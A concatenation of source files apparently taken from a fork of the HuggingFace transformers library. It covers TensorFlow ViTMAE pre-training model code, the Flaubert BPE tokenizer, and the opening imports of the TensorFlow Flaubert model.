self.vit = TFViTMAEMainLayer(config, name="vit")
def get_input_embeddings(self):
return self.vit.get_input_embeddings()
@unpack_inputs
@add_start_docstrings_to_model_forward(VIT_MAE_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=TFViTMAEModelOutput, config_class=_CONFIG_FOR_DOC)
def call(
self,
pixel_values: Optional[TFModelInputType] = None,
noise: tf.Tensor = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: bool = False,
) -> Union[TFViTMAEModelOutput, Tuple[tf.Tensor]]:
r"""
Returns:
Examples:
```python
>>> from transformers import AutoImageProcessor, TFViTMAEModel
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> image_processor = AutoImageProcessor.from_pretrained("facebook/vit-mae-base")
>>> model = TFViTMAEModel.from_pretrained("facebook/vit-mae-base")
>>> inputs = image_processor(images=image, return_tensors="tf")
>>> outputs = model(**inputs)
>>> last_hidden_states = outputs.last_hidden_state
```"""
outputs = self.vit(
pixel_values=pixel_values,
noise=noise,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
return outputs
def serving_output(self, output: TFViTMAEModelOutput) -> TFViTMAEModelOutput:
hidden_states = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attentions = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFViTMAEModelOutput(
last_hidden_state=output.last_hidden_state,
mask=output.mask,
ids_restore=output.ids_restore,
hidden_states=hidden_states,
attentions=attentions,
)
class TFViTMAEDecoder(tf.keras.layers.Layer):
def __init__(self, config, num_patches, **kwargs):
super().__init__(**kwargs)
self.decoder_embed = tf.keras.layers.Dense(config.decoder_hidden_size, name="decoder_embed")
decoder_config = deepcopy(config)
decoder_config.hidden_size = config.decoder_hidden_size
decoder_config.num_hidden_layers = config.decoder_num_hidden_layers
decoder_config.num_attention_heads = config.decoder_num_attention_heads
decoder_config.intermediate_size = config.decoder_intermediate_size
self.decoder_layers = [
TFViTMAELayer(decoder_config, name=f"decoder_layers.{j}") for j in range(config.decoder_num_hidden_layers)
]
self.decoder_norm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="decoder_norm")
self.decoder_pred = tf.keras.layers.Dense(
config.patch_size**2 * config.num_channels,
kernel_initializer=get_initializer(config.initializer_range),
name="decoder_pred",
) # encoder to decoder
self.config = config
self.num_patches = num_patches
def build(self, input_shape: tf.TensorShape):
self.mask_token = self.add_weight(
shape=(1, 1, self.config.decoder_hidden_size),
initializer=tf.random_normal_initializer(stddev=self.config.initializer_range),
trainable=True,
name="mask_token",
)
self.decoder_pos_embed = self.add_weight(
shape=(1, self.num_patches + 1, self.config.decoder_hidden_size),
initializer="zeros",
trainable=False,
name="decoder_pos_embed",
)
decoder_pos_embed = get_2d_sincos_pos_embed(
self.decoder_pos_embed.shape[-1],
int(self.num_patches**0.5),
add_cls_token=True,
)[None, ...]
self.decoder_pos_embed.assign(decoder_pos_embed)
super().build(input_shape)
def call(
self,
hidden_states,
ids_restore,
output_attentions=False,
output_hidden_states=False,
return_dict=True,
):
# embed tokens
x = self.decoder_embed(hidden_states)
# append mask tokens to sequence
mask_tokens = tf.tile(
self.mask_token,
(shape_list(x)[0], shape_list(ids_restore)[1] + 1 - shape_list(x)[1], 1),
)
x_ = tf.concat([x[:, 1:, :], mask_tokens], axis=1) # no cls token
x_ = tf.gather(x_, axis=1, batch_dims=1, indices=ids_restore) # unshuffle
x = tf.concat([x[:, :1, :], x_], axis=1) # append cls token
# add pos embed
hidden_states = x + self.decoder_pos_embed
# apply Transformer layers (blocks)
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
for i, layer_module in enumerate(self.decoder_layers):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_outputs = layer_module(
hidden_states,
head_mask=None,
output_attentions=output_attentions,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
hidden_states = self.decoder_norm(hidden_states)
# predictor projection
logits = self.decoder_pred(hidden_states)
# remove cls token
logits = logits[:, 1:, :]
if not return_dict:
return tuple(v for v in [logits, all_hidden_states, all_self_attentions] if v is not None)
return TFViTMAEDecoderOutput(logits=logits, hidden_states=all_hidden_states, attentions=all_self_attentions)
@add_start_docstrings(
"The ViTMAE Model transformer with the decoder on top for self-supervised pre-training.",
VIT_MAE_START_DOCSTRING,
)
class TFViTMAEForPreTraining(TFViTMAEPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.config = config
self.vit = TFViTMAEMainLayer(config, name="vit")
self.decoder = TFViTMAEDecoder(
config,
num_patches=self.vit.embeddings.num_patches,
name="decoder",
)
def get_input_embeddings(self):
return self.vit.get_input_embeddings()
def _prune_heads(self, heads_to_prune):
raise NotImplementedError
def patchify(self, pixel_values):
"""
Args:
pixel_values (`tf.Tensor` of shape `(batch_size, height, width, num_channels)` or `(batch_size, num_channels, height, width)`):
Pixel values.
Returns:
`tf.Tensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
Patchified pixel values.
"""
patch_size, num_channels = self.config.patch_size, self.config.num_channels
# make sure channels are last
pixel_values = tf.cond(
tf.math.equal(shape_list(pixel_values)[1], num_channels),
lambda: tf.transpose(pixel_values, perm=(0, 2, 3, 1)),
lambda: pixel_values,
)
# sanity checks
tf.debugging.assert_equal(
shape_list(pixel_values)[1],
shape_list(pixel_values)[2],
message="Make sure the pixel values have a squared size",
)
tf.debugging.assert_equal(
shape_list(pixel_values)[1] % patch_size,
0,
message="Make sure the pixel values have a size that is divisible by the patch size",
)
tf.debugging.assert_equal(
shape_list(pixel_values)[3],
num_channels,
message=(
"Make sure the number of channels of the pixel values is equal to the one set in the configuration"
),
)
# patchify
batch_size = shape_list(pixel_values)[0]
num_patches_one_direction = shape_list(pixel_values)[2] // patch_size
patchified_pixel_values = tf.reshape(
pixel_values,
(batch_size, num_patches_one_direction, patch_size, num_patches_one_direction, patch_size, num_channels),
)
patchified_pixel_values = tf.einsum("nhpwqc->nhwpqc", patchified_pixel_values)
patchified_pixel_values = tf.reshape(
patchified_pixel_values,
(batch_size, num_patches_one_direction * num_patches_one_direction, patch_size**2 * num_channels),
)
return patchified_pixel_values
def unpatchify(self, patchified_pixel_values):
"""
Args:
patchified_pixel_values (`tf.Tensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
Patchified pixel values.
Returns:
`tf.Tensor` of shape `(batch_size, height, width, num_channels)`:
Pixel values.
"""
patch_size, num_channels = self.config.patch_size, self.config.num_channels
num_patches_one_direction = int(shape_list(patchified_pixel_values)[1] ** 0.5)
# sanity check
tf.debugging.assert_equal(
num_patches_one_direction * num_patches_one_direction,
shape_list(patchified_pixel_values)[1],
message="Make sure that the number of patches can be squared",
)
# unpatchify
batch_size = shape_list(patchified_pixel_values)[0]
patchified_pixel_values = tf.reshape(
patchified_pixel_values,
(batch_size, num_patches_one_direction, num_patches_one_direction, patch_size, patch_size, num_channels),
)
patchified_pixel_values = tf.einsum("nhwpqc->nhpwqc", patchified_pixel_values)
pixel_values = tf.reshape(
patchified_pixel_values,
(batch_size, num_patches_one_direction * patch_size, num_patches_one_direction * patch_size, num_channels),
)
return pixel_values
def forward_loss(self, pixel_values, pred, mask):
"""
Args:
pixel_values (`tf.Tensor` of shape `(batch_size, height, width, num_channels)`):
Pixel values.
pred (`tf.Tensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
Predicted pixel values.
mask (`tf.Tensor` of shape `(batch_size, sequence_length)`):
Tensor indicating which patches are masked (1) and which are not (0).
Returns:
`tf.Tensor`: Pixel reconstruction loss.
"""
target = self.patchify(pixel_values)
if self.config.norm_pix_loss:
mean = tf.reduce_mean(target, axis=-1, keepdims=True)
var = tf.math.reduce_variance(target, axis=-1, keepdims=True)
target = (target - mean) / (var + 1.0e-6) ** 0.5
loss = (pred - target) ** 2
loss = tf.reduce_mean(loss, axis=-1) # [batch_size, num_patches], mean loss per patch
loss = tf.reduce_sum(loss * mask) / tf.reduce_sum(mask) # mean loss on removed patches
loss = tf.reshape(loss, (1,))
return loss
@unpack_inputs
@add_start_docstrings_to_model_forward(VIT_MAE_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=TFViTMAEForPreTrainingOutput, config_class=_CONFIG_FOR_DOC)
def call(
self,
pixel_values: Optional[TFModelInputType] = None,
noise: tf.Tensor = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: bool = False,
) -> Union[TFViTMAEForPreTrainingOutput, Tuple[tf.Tensor]]:
r"""
Returns:
Examples:
```python
>>> from transformers import AutoImageProcessor, TFViTMAEForPreTraining
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> image_processor = AutoImageProcessor.from_pretrained("facebook/vit-mae-base")
>>> model = TFViTMAEForPreTraining.from_pretrained("facebook/vit-mae-base")
>>> inputs = image_processor(images=image, return_tensors="pt")
>>> outputs = model(**inputs)
>>> loss = outputs.loss
>>> mask = outputs.mask
>>> ids_restore = outputs.ids_restore
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.vit(
pixel_values=pixel_values,
noise=noise,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
latent = outputs.last_hidden_state
ids_restore = outputs.ids_restore
mask = outputs.mask
decoder_outputs = self.decoder(latent, ids_restore) # [batch_size, num_patches, patch_size**2*3]
logits = decoder_outputs.logits
loss = self.forward_loss(pixel_values, logits, mask)
if not return_dict:
output = (logits, mask, ids_restore) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFViTMAEForPreTrainingOutput(
loss=loss,
logits=logits,
mask=mask,
ids_restore=ids_restore,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
def serving_output(self, output: TFViTMAEForPreTrainingOutput) -> TFViTMAEForPreTrainingOutput:
hidden_states = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attentions = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFViTMAEForPreTrainingOutput(
logits=output.logits,
mask=output.mask,
ids_restore=output.ids_restore,
hidden_states=hidden_states,
attentions=attentions,
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 23,947 | src/transformers/models/flaubert/tokenization_flaubert.py | # coding=utf-8
# Copyright 2019-present CNRS, Facebook Inc. and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for Flaubert."""
import json
import os
import re
import unicodedata
from typing import List, Optional, Tuple
from ...tokenization_utils import PreTrainedTokenizer
from ...utils import logging
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"flaubert/flaubert_small_cased": (
"https://huggingface.co/flaubert/flaubert_small_cased/resolve/main/vocab.json"
),
"flaubert/flaubert_base_uncased": (
"https://huggingface.co/flaubert/flaubert_base_uncased/resolve/main/vocab.json"
),
"flaubert/flaubert_base_cased": "https://huggingface.co/flaubert/flaubert_base_cased/resolve/main/vocab.json",
"flaubert/flaubert_large_cased": (
"https://huggingface.co/flaubert/flaubert_large_cased/resolve/main/vocab.json"
),
},
"merges_file": {
"flaubert/flaubert_small_cased": (
"https://huggingface.co/flaubert/flaubert_small_cased/resolve/main/merges.txt"
),
"flaubert/flaubert_base_uncased": (
"https://huggingface.co/flaubert/flaubert_base_uncased/resolve/main/merges.txt"
),
"flaubert/flaubert_base_cased": "https://huggingface.co/flaubert/flaubert_base_cased/resolve/main/merges.txt",
"flaubert/flaubert_large_cased": (
"https://huggingface.co/flaubert/flaubert_large_cased/resolve/main/merges.txt"
),
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"flaubert/flaubert_small_cased": 512,
"flaubert/flaubert_base_uncased": 512,
"flaubert/flaubert_base_cased": 512,
"flaubert/flaubert_large_cased": 512,
}
PRETRAINED_INIT_CONFIGURATION = {
"flaubert/flaubert_small_cased": {"do_lowercase": False},
"flaubert/flaubert_base_uncased": {"do_lowercase": True},
"flaubert/flaubert_base_cased": {"do_lowercase": False},
"flaubert/flaubert_large_cased": {"do_lowercase": False},
}
def convert_to_unicode(text):
"""
Converts `text` to Unicode (if it's not already), assuming UTF-8 input.
"""
def ensure_text(s, encoding="utf-8", errors="strict"):
if isinstance(s, bytes):
return s.decode(encoding, errors)
elif isinstance(s, str):
return s
else:
raise TypeError(f"not expecting type '{type(s)}'")
return ensure_text(text, encoding="utf-8", errors="ignore")
# Copied from transformers.models.xlm.tokenization_xlm.get_pairs
def get_pairs(word):
"""
Return set of symbol pairs in a word. word is represented as tuple of symbols (symbols being variable-length
strings)
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
# Copied from transformers.models.xlm.tokenization_xlm.replace_unicode_punct
def replace_unicode_punct(text):
"""
Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/replace-unicode-punctuation.perl
"""
text = text.replace(",", ",")
text = re.sub(r"。\s*", ". ", text)
text = text.replace("、", ",")
text = text.replace("”", '"')
text = text.replace("“", '"')
text = text.replace("∶", ":")
text = text.replace(":", ":")
text = text.replace("?", "?")
text = text.replace("《", '"')
text = text.replace("》", '"')
text = text.replace(")", ")")
text = text.replace("!", "!")
text = text.replace("(", "(")
text = text.replace(";", ";")
text = text.replace("1", "1")
text = text.replace("」", '"')
text = text.replace("「", '"')
text = text.replace("0", "0")
text = text.replace("3", "3")
text = text.replace("2", "2")
text = text.replace("5", "5")
text = text.replace("6", "6")
text = text.replace("9", "9")
text = text.replace("7", "7")
text = text.replace("8", "8")
text = text.replace("4", "4")
text = re.sub(r".\s*", ". ", text)
text = text.replace("~", "~")
text = text.replace("’", "'")
text = text.replace("…", "...")
text = text.replace("━", "-")
text = text.replace("〈", "<")
text = text.replace("〉", ">")
text = text.replace("【", "[")
text = text.replace("】", "]")
text = text.replace("%", "%")
return text
# Copied from transformers.models.xlm.tokenization_xlm.remove_non_printing_char
def remove_non_printing_char(text):
"""
Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/remove-non-printing-char.perl
"""
output = []
for char in text:
cat = unicodedata.category(char)
if cat.startswith("C"):
continue
output.append(char)
return "".join(output)
class FlaubertTokenizer(PreTrainedTokenizer):
"""
Construct a Flaubert tokenizer. Based on Byte-Pair Encoding. The tokenization process is the following:
- Moses preprocessing and tokenization.
- Normalizing all inputs text.
- The arguments `special_tokens` and the function `set_special_tokens`, can be used to add additional symbols (like
"__classify__") to a vocabulary.
- The argument `do_lowercase` controls lower casing (automatically set for pretrained vocabularies).
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Vocabulary file.
merges_file (`str`):
Merges file.
do_lowercase (`bool`, *optional*, defaults to `False`):
Controls lower casing.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
bos_token (`str`, *optional*, defaults to `"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
cls_token (`str`, *optional*, defaults to `"</s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
mask_token (`str`, *optional*, defaults to `"<special1>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
additional_special_tokens (`List[str]`, *optional*, defaults to `["<special0>","<special1>","<special2>","<special3>","<special4>","<special5>","<special6>","<special7>","<special8>","<special9>"]`):
List of additional special tokens.
lang2id (`Dict[str, int]`, *optional*):
Dictionary mapping languages string identifiers to their IDs.
id2lang (`Dict[int, str]`, *optional*):
Dictionary mapping language IDs to their string identifiers.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(
self,
vocab_file,
merges_file,
do_lowercase=False,
unk_token="<unk>",
bos_token="<s>",
sep_token="</s>",
pad_token="<pad>",
cls_token="</s>",
mask_token="<special1>",
additional_special_tokens=[
"<special0>",
"<special1>",
"<special2>",
"<special3>",
"<special4>",
"<special5>",
"<special6>",
"<special7>",
"<special8>",
"<special9>",
],
lang2id=None,
id2lang=None,
**kwargs,
):
do_lowercase_and_remove_accent = kwargs.pop("do_lowercase_and_remove_accent", None)
if do_lowercase_and_remove_accent is not None:
logger.warning(
"`do_lowercase_and_remove_accent` is passed as a keyword argument, but this won't do anything."
" `FlaubertTokenizer` will always set it to `False`."
)
# always `False`
self.do_lowercase_and_remove_accent = False
self.do_lowercase = do_lowercase
super().__init__(
unk_token=unk_token,
bos_token=bos_token,
sep_token=sep_token,
pad_token=pad_token,
cls_token=cls_token,
mask_token=mask_token,
additional_special_tokens=additional_special_tokens,
lang2id=lang2id,
id2lang=id2lang,
**kwargs,
)
try:
import sacremoses
except ImportError:
raise ImportError(
"You need to install sacremoses to use FlaubertTokenizer. "
"See https://pypi.org/project/sacremoses/ for installation."
)
self.sm = sacremoses
# cache of sm.MosesPunctNormalizer instance
self.cache_moses_punct_normalizer = {}
# cache of sm.MosesTokenizer instance
self.cache_moses_tokenizer = {}
self.lang_with_custom_tokenizer = {"zh", "th", "ja"}
self.lang2id = lang2id
self.id2lang = id2lang
if lang2id is not None and id2lang is not None:
assert len(lang2id) == len(id2lang)
self.ja_word_tokenizer = None
self.zh_word_tokenizer = None
with open(vocab_file, encoding="utf-8") as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for k, v in self.encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
merges = merges_handle.read().split("\n")[:-1]
merges = [tuple(merge.split()[:2]) for merge in merges]
self.bpe_ranks = dict(zip(merges, range(len(merges))))
self.cache = {}
@property
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.do_lower_case
def do_lower_case(self):
return self.do_lowercase_and_remove_accent
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.moses_punct_norm
def moses_punct_norm(self, text, lang):
if lang not in self.cache_moses_punct_normalizer:
punct_normalizer = self.sm.MosesPunctNormalizer(lang=lang)
self.cache_moses_punct_normalizer[lang] = punct_normalizer
else:
punct_normalizer = self.cache_moses_punct_normalizer[lang]
return punct_normalizer.normalize(text)
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.moses_tokenize
def moses_tokenize(self, text, lang):
if lang not in self.cache_moses_tokenizer:
moses_tokenizer = self.sm.MosesTokenizer(lang=lang)
self.cache_moses_tokenizer[lang] = moses_tokenizer
else:
moses_tokenizer = self.cache_moses_tokenizer[lang]
return moses_tokenizer.tokenize(text, return_str=False, escape=False)
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.moses_pipeline
def moses_pipeline(self, text, lang):
text = replace_unicode_punct(text)
text = self.moses_punct_norm(text, lang)
text = remove_non_printing_char(text)
return text
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.ja_tokenize
def ja_tokenize(self, text):
if self.ja_word_tokenizer is None:
try:
import Mykytea
self.ja_word_tokenizer = Mykytea.Mykytea(
f"-model {os.path.expanduser('~')}/local/share/kytea/model.bin"
)
except (AttributeError, ImportError):
logger.error(
"Make sure you install KyTea (https://github.com/neubig/kytea) and it's python wrapper"
" (https://github.com/chezou/Mykytea-python) with the following steps"
)
logger.error("1. git clone git@github.com:neubig/kytea.git && cd kytea")
logger.error("2. autoreconf -i")
logger.error("3. ./configure --prefix=$HOME/local")
logger.error("4. make && make install")
logger.error("5. pip install kytea")
raise
return list(self.ja_word_tokenizer.getWS(text))
@property
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.vocab_size
def vocab_size(self):
return len(self.encoder)
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.get_vocab
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.bpe
def bpe(self, token):
word = tuple(token[:-1]) + (token[-1] + "</w>",)
if token in self.cache:
return self.cache[token]
pairs = get_pairs(word)
if not pairs:
return token + "</w>"
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
if word == "\n </w>":
word = "\n</w>"
self.cache[token] = word
return word
def preprocess_text(self, text):
text = text.replace("``", '"').replace("''", '"')
text = convert_to_unicode(text)
text = unicodedata.normalize("NFC", text)
if self.do_lowercase:
text = text.lower()
return text
def _tokenize(self, text, bypass_tokenizer=False):
"""
Tokenize a string given language code using Moses.
Details of tokenization:
- [sacremoses](https://github.com/alvations/sacremoses): port of Moses
- Install with `pip install sacremoses`
Args:
- bypass_tokenizer: Allow users to preprocess and tokenize the sentences externally (default = False)
(bool). If True, we only apply BPE.
Returns:
List of tokens.
"""
lang = "fr"
if lang and self.lang2id and lang not in self.lang2id:
logger.error(
"Supplied language code not found in lang2id mapping. Please check that your language is supported by"
" the loaded pretrained model."
)
if bypass_tokenizer:
text = text.split()
else:
text = self.preprocess_text(text)
text = self.moses_pipeline(text, lang=lang)
text = self.moses_tokenize(text, lang=lang)
split_tokens = []
for token in text:
if token:
split_tokens.extend(list(self.bpe(token).split(" ")))
return split_tokens
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer._convert_token_to_id
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer._convert_id_to_token
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index, self.unk_token)
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.convert_tokens_to_string
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
out_string = "".join(tokens).replace("</w>", " ").strip()
return out_string
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.build_inputs_with_special_tokens
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. An XLM sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
bos = [self.bos_token_id]
sep = [self.sep_token_id]
if token_ids_1 is None:
return bos + token_ids_0 + sep
return bos + token_ids_0 + sep + token_ids_1 + sep
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.get_special_tokens_mask
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is not None:
return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1]
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.create_token_type_ids_from_sequences
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. An XLM sequence
pair mask has the following format:
```
0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1
| first sequence | second sequence |
```
If `token_ids_1` is `None`, this method only returns the first portion of the mask (0s).
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [token type IDs](../glossary#token-type-ids) according to the given sequence(s).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.save_vocabulary
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, indent=2, sort_keys=True, ensure_ascii=False) + "\n")
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return vocab_file, merge_file
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.__getstate__
def __getstate__(self):
state = self.__dict__.copy()
state["sm"] = None
return state
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.__setstate__
def __setstate__(self, d):
self.__dict__ = d
try:
import sacremoses
except ImportError:
raise ImportError(
"You need to install sacremoses to use XLMTokenizer. "
"See https://pypi.org/project/sacremoses/ for installation."
)
self.sm = sacremoses
|
27182812/ChatGLM-LLaMA-chinese-insturct | 56,749 | src/transformers/models/flaubert/modeling_tf_flaubert.py | # coding=utf-8
# Copyright 2019-present, Facebook, Inc and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
TF 2.0 Flaubert model.
"""
import itertools
import random
import warnings
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union
import numpy as np
import tensorflow as tf
from ...activations_tf import get_tf_activation
from ...modeling_tf_outputs import (
TFBaseModelOutput,
TFMultipleChoiceModelOutput,
TFQuestionAnsweringModelOutput,
TFSequenceClassifierOutput,
TFTokenClassifierOutput,
)
from ...modeling_tf_utils import (
TFModelInputType,
TFMultipleChoiceLoss,
TFPreTrainedModel,
TFQuestionAnsweringLoss,
TFSequenceClassificationLoss,
TFSequenceSummary,
TFSharedEmbeddings,
TFTokenClassificationLoss,
get_initializer,
keras_serializable,
unpack_inputs,
)
from ...tf_utils import shape_list, stable_softmax
from ...utils import (
MULTIPLE_CHOICE_DUMMY_INPUTS,
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
)
from .configuration_flaubert import FlaubertConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "flaubert/flaubert_base_cased"
_CONFIG_FOR_DOC = "FlaubertConfig"
TF_FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
